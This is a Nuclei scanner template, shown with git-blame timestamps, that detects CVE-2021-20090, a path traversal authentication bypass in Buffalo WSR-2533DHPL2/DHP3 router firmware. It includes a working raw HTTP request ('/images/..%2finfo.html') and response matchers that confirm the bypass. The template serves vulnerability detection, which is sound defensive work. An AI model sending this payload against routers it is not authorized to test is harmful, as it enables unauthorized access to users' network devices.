nuclei-templates/http/cves/2021/CVE-2021-20090.yaml

52 lines
2.0 KiB
YAML
Raw Normal View History

2021-08-10 16:51:46 +00:00
id: CVE-2021-20090
info:
name: Buffalo WSR-2533DHPL2 - Path Traversal
author: gy741
severity: critical
2021-08-10 16:51:46 +00:00
description: |
Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces.
2023-09-27 15:51:13 +00:00
impact: |
An attacker can exploit this vulnerability to read sensitive files, such as configuration files, credentials, or other sensitive information.
2023-09-06 12:09:01 +00:00
remediation: |
Apply the latest firmware update provided by Buffalo to fix the path traversal vulnerability.
reference:
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090
- https://www.kb.cert.org/vuls/id/914124
- https://www.secpod.com/blog/arcadyan-based-routers-and-modems-under-active-exploitation/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-20090
cwe-id: CWE-22
epss-score: 0.97465
epss-percentile: 0.99955
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: buffalo
product: wsr-2533dhpl2-bk_firmware
tags: cve,cve2021,lfi,buffalo,firmware,iot,kev,tenable
2021-08-10 16:51:46 +00:00
http:
2021-08-10 16:51:46 +00:00
- raw:
- |
GET /images/..%2finfo.html HTTP/1.1
Host: {{Hostname}}
2021-08-11 12:27:58 +00:00
Referer: {{BaseURL}}/info.html
2021-08-10 16:51:46 +00:00
matchers-condition: and
matchers:
- type: word
words:
- 'URLToken(cgi_path)'
- 'pppoe'
- 'wan'
condition: and
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 4b0a004830460221009f2ac54d068e5549fd7eaf1335230f3f8bdad9d601c0edd791a9851e6d9511820221008e1bcf8ae00bf61371d0684a711c6136b439ef8ef90dc6d9f559231bce340961:922c64590222798bb761d5b6d8e72950